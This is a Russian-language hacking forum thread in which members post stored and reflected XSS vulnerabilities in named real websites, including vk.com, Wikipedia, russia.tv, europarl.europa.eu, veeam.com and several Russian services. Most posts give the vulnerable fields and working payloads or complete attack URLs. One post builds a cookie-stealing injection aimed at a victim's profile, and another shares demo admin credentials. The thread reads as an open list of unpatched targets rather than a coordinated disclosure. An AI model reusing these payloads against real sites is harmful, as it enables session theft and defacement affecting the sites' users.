Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.isdera.de/dia_auto_cw.php?delay=10000&dia=27%22%20%3C/form%3E%20%3C/input%3E%3Ch1%3EXSS%20attack%20--GhostW%20aka%20Sepo--%3C/h1%3E
    http://en.wikipedia.org/wiki/File:Isdera_imperator_1.jpg
     
  2. e17

    e17 Member

    Joined:
    8 Feb 2013
    Messages:
    47
    Likes Received:
    57
    Reputations:
    81
    vk.com и Википедия.
    Пассивка, но все равно решил запостить.
    [​IMG]

    В Вики аналогично, уязвим любой ресурс с возможностью загрузки и исполнения файла с форматом .svg
     
    #482 e17, 4 Apr 2014
    Last edited: 5 Apr 2014
    1 person likes this.
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    http://www.shoptraffic.com.ua

    active XSS
     
    1 person likes this.
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    YaBtr, пассивка же. Выполняемый код передается в запросе ;)
     
  5. Гуф.

    Гуф. New Member

    Joined:
    25 Feb 2014
    Messages:
    19
    Likes Received:
    3
    Reputations:
    4
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Может все-таки активная ;)
     
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    YaBtr, и все-таки активная. Думал только с реферером работает =)
    Интересный пример кстати.
     
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    filmpro.ru - социальная киносеть

    Яндекс тИЦ 1100
    Google Page Rank 6/10
    Суточная посещаемость 37К юзеров

    Редактируем профиль - Уязвимые поля "Инересы","Работа" и "Образование"
    Либо
    Моё фото - Создать альбом - Уязвимое поле "Название"

    [​IMG]
     
    3 people like this.
  9. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Сooksa.ru - Социальная сеть для кулинаров.

    Code:
    Яндекс тИЦ (CY)		180 +20 	
    Alexa Rank		163,311 -4,693
    Google PageRank (PR)	4
    Жмё на кнопку "Добавить рецепт" , далее запиливаем ядовитый рецепт =)
    Уязвимые параметры:
    Ингредиент
    Примечание
     
    1 person likes this.
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Kasima.com

    [​IMG]

    Уязвимое поле "Статус"
    <script>alert('xss')</script>


    Уязвимое поле "Имя"
    Работает в сообщениях
    [​IMG]
     
    _________________________
    #490 kingbeef, 19 Jun 2014
    Last edited: 19 Jun 2014
    1 person likes this.
  11. .Hk

    .Hk New Member

    Joined:
    10 Jan 2008
    Messages:
    3
    Likes Received:
    2
    Reputations:
    -5
    Активная XSS на демо портале блога http://demo.nibbleblog.com/

    1. Зайти в админку : http://demo.nibbleblog.com/admin.php
    логин;пароль: admin ; demo
    2. Создать любую запись, в поле короткой ссылки написать: "></a></li></ul><script>alert("Antichat.test"); </script>
    3. Уязвимость во многих местах движка присутствует .
     
  12. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://www.odnako.org/

    тиц 1600
    РУ трафика 100К

    Создать блог

    уязвимый параметр превью

    [​IMG]
     
    #492 OxoTnik, 8 Aug 2014
    Last edited: 8 Aug 2014
    Ruslan1993it, BigBear and psihoz26 like this.
  13. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    russia.tv
    анктивная xss в поле имя и фамилия, при изменении их, в аккаунте.
     
    Ruslan1993it and Shellcode like this.
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    aeterna.qip.ru

    Создаем тест.
    Название теста
    "><script>alert()</script



    [​IMG]
     
    _________________________
    Ruslan1993it and psihoz26 like this.
  15. Siqvik

    Siqvik New Member

    Joined:
    9 Aug 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Вот

    https://web.pechkin-mail.ru/

    Форма регистрации. Вроде бы все поля =)

    Code:
     "><script>alert()</script> [code]
     
  16. st1x0

    st1x0 Member

    Joined:
    23 May 2015
    Messages:
    9
    Likes Received:
    5
    Reputations:
    1
    Была найдена случайно в поле поиске книг XSS
    Прямая ссылка и XSS:
    europarl.europa.eu/100books/en/list.html
    Code:
    "></script><sc""><marquee><H1>xss vuln found</H1></marquee><br /><center><IMG src="http://db.tt/E7dH5HLR"></center></script>
    
    joinup.ec.europa.eu/svn/
    Весьма интересна)
     
    DrSpawn likes this.
  17. dejaview

    dejaview New Member

    Joined:
    27 Nov 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    тиц/пр: 550/6
    url: https://www.veeam.com/account-edit-profile.html
    Code:
    <script>alert(123);</script>
    Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest.
    Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку -
    Code:
    https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injected<"+a+">alert(document.cookie);</"+a+">%7Cjob_description%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"</script>
    [​IMG]
     
    #497 dejaview, 27 Nov 2015
    Last edited: 28 Nov 2015
  18. st1x0

    st1x0 Member

    Joined:
    23 May 2015
    Messages:
    9
    Likes Received:
    5
    Reputations:
    1
    Выложу несколько сайтов, может кому и пригодится. Ведь на рамблере молчат значит все равно на багу.
    Code:
    http://nova.rambler.ru/search?query=%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E&filter=%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm%281%29%3E
    Code:
    http://www.rfbr.ru/rffi/ru/search/?query=%C6%F3%F0%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E%E1%E8%ED%E0
    Code:
    http://www.muztorg.ru/search/?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E
    Code:
    http://www.mcx.ru/fts/search?query=%3Cinput+type%3D%22text%22+value%3D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E
    
     
    Ruslan1993it likes this.
  19. st1x0

    st1x0 Member

    Joined:
    23 May 2015
    Messages:
    9
    Likes Received:
    5
    Reputations:
    1
    Также есть и на bing.com/translate но кто скажет эта уязвимость или фича движка??? тот ее и заберет.
    [​IMG]
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это песочница, там нет пользовательских данных
     
    _________________________